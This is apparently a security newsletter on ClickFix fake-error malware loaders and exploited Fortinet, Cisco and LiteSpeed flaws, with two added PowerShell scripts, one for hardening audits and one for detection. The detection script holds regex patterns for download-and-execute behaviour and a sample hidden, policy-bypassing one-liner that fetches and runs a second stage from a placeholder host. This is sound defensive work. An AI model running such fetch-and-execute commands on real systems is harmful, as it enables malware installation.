Fake Browser Updates Are Now a Professional Malware Delivery Business

The ClickFix technique has evolved into a sophisticated malware delivery industry — three new loader families this week alone. Plus: three critical Fortinet zero-days being actively exploited, Cisco SD-WAN compromised in the wild, and a cPanel plugin flaw added to CISA's 'must-patch' list.


🌐 World Intel

Three New Malware Loaders Join the ClickFix Ecosystem — All Using Fake Browser Updates

Researchers identified three new malware loaders — BabaDeda, Lorem Ipsum, and Potemkin — all using the ClickFix social engineering technique. ClickFix works by showing victims a realistic-looking error message on a web page, then instructing them to "fix" the error by opening a run dialog and pasting a command. The command runs a PowerShell script that silently installs malware. The appearance of three new loaders in a single week suggests ClickFix has matured into a delivery-as-a-service ecosystem where multiple criminal groups buy access to the same distribution infrastructure.

Source: The Hacker News

LiteSpeed cPanel Plugin CVE-2026-54420 Added to CISA's Must-Patch List

CISA added CVE-2026-54420 to its Known Exploited Vulnerabilities (KEV) catalog — the official U.S. government list of flaws confirmed to be used in real attacks. The flaw is in the LiteSpeed Cache plugin for cPanel, a popular web hosting control panel. The vulnerability allows a user on a shared hosting server to escalate their privileges to root — effectively gaining control of the entire server and every other website hosted on it. On shared hosting, where hundreds of websites might run on the same machine, a single compromised account can mean a compromised host for everyone. CVSS score: 8.5.

Source: The Hacker News

Cisco Catalyst SD-WAN Manager CVE-2026-20262 Actively Exploited in the Wild

A flaw in Cisco Catalyst SD-WAN Manager — software that manages wide-area networks for enterprises — is being actively exploited. CVE-2026-20262 (CVSS 6.5) allows an attacker who has any file-write capability on the system to escalate to root, gaining full control. SD-WAN Manager is particularly sensitive: it's the central control plane that configures and manages all the network connections for an organization. Compromising it means an attacker can reconfigure traffic routing, intercept communications, or disable network segments. Cisco has released a patch.

Source: The Hacker News

⚔️ Active Attacks

Fortinet FortiSandbox — Three CVSS 9.1 Vulnerabilities Being Actively Exploited

Fortinet's FortiSandbox product has three critical vulnerabilities under active exploitation, all rated CVSS 9.1. CVE-2026-39813 is a path traversal and authentication bypass — attackers can access files they shouldn't and skip login entirely. CVE-2026-39808 is an OS command injection requiring no authentication — send a crafted request, run any command you want on the server. CVE-2026-25089 is a second command injection flaw, patched only last week. Fortinet products have been heavily targeted by state-sponsored groups and ransomware operators for years, and this pattern of multiple simultaneous critical exploits is consistent with organized attacker campaigns that stockpile Fortinet vulnerabilities.

What you can do: If you run FortiSandbox, treat patching as a same-day emergency. Restrict FortiSandbox to internal network access only — it should never be reachable from the internet. If you cannot patch immediately, temporarily take FortiSandbox offline rather than leaving it exposed. Review logs for any unusual command execution or access from unexpected IP addresses going back 30 days.

Source: The Hacker News

🔓 New Vulnerabilities

CVE-2026-39813 Fortinet FortiSandbox  ·  CVSS 9.1 — Critical

Path traversal combined with authentication bypass. Attackers can access files outside allowed directories and skip the login process entirely. Actively exploited — no authentication required to begin exploitation.

Patch immediately. Isolate from internet access if patching is delayed. This flaw is being used in active campaigns now.

CVE-2026-39808 Fortinet FortiSandbox  ·  CVSS 9.1 — Critical

Unauthenticated OS command injection — any attacker who can reach the FortiSandbox management interface can run arbitrary operating system commands. No credentials required. Remote code execution with the permissions of the FortiSandbox process.

Patch now. This is the most severe of the three FortiSandbox flaws in terms of ease of exploitation.

CVE-2026-54420 LiteSpeed Cache cPanel Plugin  ·  CVSS 8.5 — High

Privilege escalation to root on shared hosting environments running cPanel with LiteSpeed Cache. On shared hosting servers, one compromised account can mean the entire server — and all other hosted websites — are exposed. CISA added this to the KEV catalog, confirming active exploitation.

Update the LiteSpeed Cache cPanel plugin immediately. Hosting providers should push this update to all customers. If you host websites on shared hosting, contact your host to confirm whether the patch has been applied to your server.

🛠 New Tech

ClickFix attacks succeed partly because PowerShell is so capable and so poorly monitored on most Windows machines. A defensive technique that directly addresses this is called PowerShell Constrained Language Mode — a built-in Windows security feature that limits what PowerShell scripts can do, blocking the most dangerous commands that ClickFix malware depends on. Combined with Script Block Logging (another built-in Windows feature that records every PowerShell script that runs on a machine), organizations gain both prevention and detection. Both features are available in Windows 10 and 11 Pro and Enterprise, and can be configured via Group Policy at no additional cost. Many organizations simply haven't turned them on. The configuration takes about an hour for an IT professional and meaningfully raises the bar against the entire ClickFix family of attacks.
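As an added example (not from this newsletter and not Microsoft's code), here is a PowerShell check an administrator can run on a host to see whether the two settings above are in effect. It reads the registry value that the Script Block Logging Group Policy setting writes and the language mode of the current session; the function names are my own.

```powershell
# Added example: audit whether Script Block Logging is turned on by policy and
# which PowerShell language mode this host enforces. Run in an elevated
# PowerShell session on the Windows host being checked.

function Get-PSHardeningState {
    # The Group Policy setting "Turn on PowerShell Script Block Logging"
    # writes EnableScriptBlockLogging=1 under this key.
    $sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $sbl = Get-ItemProperty -Path $sblKey -ErrorAction SilentlyContinue
    $sblEnabled = ($null -ne $sbl) -and ($sbl.EnableScriptBlockLogging -eq 1)

    # 'FullLanguage' means nothing is constrained; 'ConstrainedLanguage' is
    # the hardened state that blocks the .NET and COM access ClickFix loaders rely on.
    $mode = $ExecutionContext.SessionState.LanguageMode

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        ScriptBlockLogging = $sblEnabled
        LanguageMode       = [string]$mode
        Hardened           = $sblEnabled -and ($mode -eq 'ConstrainedLanguage')
    }
}

function Enable-ScriptBlockLogging {
    # Writes the same registry value the Group Policy setting pushes; useful on
    # hosts that are not domain-joined. Language mode is deliberately not set
    # here: Constrained Language Mode should come from an AppLocker or WDAC
    # policy in enforcement mode so that a pasted one-liner cannot undo it.
    $sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $sblKey)) { New-Item -Path $sblKey -Force | Out-Null }
    Set-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

$state = Get-PSHardeningState
$state | Format-List
if (-not $state.ScriptBlockLogging) {
    Write-Warning 'Script Block Logging is off: PowerShell activity on this host is not recorded.'
}
if ($state.LanguageMode -ne 'ConstrainedLanguage') {
    Write-Warning 'This session is not in Constrained Language Mode.'
}
```

Call Enable-ScriptBlockLogging only on hosts where Group Policy does not already manage the value, otherwise the next policy refresh decides.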

💡 Deep Dive

ClickFix: How a Fake Error Message Became One of the Biggest Malware Delivery Systems in the World

The technique that spawned BabaDeda, Lorem Ipsum, and Potemkin — and dozens of other malware families before them — is called ClickFix. If you haven't encountered it yet, you probably will. Understanding how it works is the best defense against it.

Here's the setup. You visit a website — it could be a hacked legitimate site, a fake document viewer, or a page you reached by clicking a link in an email. The page displays an error message. It looks exactly like a real browser or Windows error: official fonts, familiar color schemes, technical-looking text. "An error occurred while loading this page," it might say, or "Your browser needs to be updated to view this content."

Then comes the ClickFix twist. Instead of a normal "OK" button, the page gives you instructions: press the Windows key and R to open a Run dialog, then paste the text below into it and press Enter. The text below is a PowerShell command that downloads and runs malware.

Why does this work so well? Several reasons, all of them connected to how people think about computers. First, it looks authoritative. Error messages with technical text trigger a learned response in most people: this is a computer problem, I need to follow the instructions to fix it. Second, it asks the victim to do the work — which feels like fixing a problem rather than causing one. Third, the copied command goes directly into a Windows run dialog, bypassing the browser entirely. No file is downloaded. No executable appears in your Downloads folder. Nothing gets flagged by download warnings. Malware executes and the page returns to normal.

The genius and the horror of ClickFix is that it doesn't exploit a software vulnerability. It exploits a human one: the desire to fix a problem and the tendency to trust official-looking instructions. You can patch every piece of software on your machine and still fall victim to it.

The defense is behavioral. The Windows run dialog (Win+R) should never be used based on instructions from a website. No legitimate website will ever ask you to open PowerShell or the run dialog to fix a problem. If you see these instructions anywhere online, close the browser tab. That's it. There is no edge case where this is a real fix for a real problem.
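As an added example, not part of the original article: a PowerShell detection that scores Script Block Logging events (Event ID 4104) against the ClickFix pattern described above, a single pasted command that hides its window, disables policy checks and fetches then executes a second stage. The function and indicator names are my own, and the two sample commands are constructed test inputs.

```powershell
# Added example: flag script block events that look like a ClickFix one-liner.
# Requires Script Block Logging to be enabled for the live query at the end.

function Test-ClickFixIndicators {
    param([Parameter(Mandatory)][string]$ScriptText)
    # Indicator name -> case-insensitive regex over the logged script text.
    $indicators = [ordered]@{
        HiddenWindow    = '-w(indowstyle)?\s+h(idden)?\b'
        PolicyBypass    = '-e(xecutionpolicy|p)?\s+bypass\b'
        EncodedCommand  = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
        WebFetch        = 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\birm\b|Invoke-RestMethod|Net\.WebClient'
        RemoteExecution = '\biex\b|Invoke-Expression'
    }
    $hits = foreach ($name in $indicators.Keys) {
        if ($ScriptText -imatch $indicators[$name]) { $name }
    }
    # Executing whatever was fetched, plus at least one more indicator, is the
    # core signal; any single indicator alone is common in legitimate admin scripts.
    [pscustomobject]@{
        Indicators = @($hits)
        Suspicious = (@($hits).Count -ge 2) -and ('RemoteExecution' -in @($hits))
    }
}

# Constructed samples: a routine admin command and a ClickFix-style one-liner
# (the URL is a placeholder, not a real second stage).
$samples = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv services.csv',
    '-w hidden -ep bypass -c "iex (irm ''https://example.invalid/stage'')"'
)
$samples | ForEach-Object { Test-ClickFixIndicators -ScriptText $_ }
# First sample: no indicators, Suspicious = False. Second: four indicators, Suspicious = True.

# Against real telemetry: scan the most recent 200 script block events on this host.
# For 4104 events, Properties[2] carries the logged ScriptBlockText.
$log = 'Microsoft-Windows-PowerShell/Operational'
Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 4104 } -MaxEvents 200 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $r = Test-ClickFixIndicators -ScriptText $text
        if ($r.Suspicious) {
            [pscustomobject]@{ Time = $_.TimeCreated; Indicators = ($r.Indicators -join ','); Text = $text }
        }
    }
```

Feed the flagged events into your SIEM alongside process-creation telemetry: a powershell.exe launched from explorer.exe (the Run dialog's parent) with these indicators is the ClickFix chain end to end.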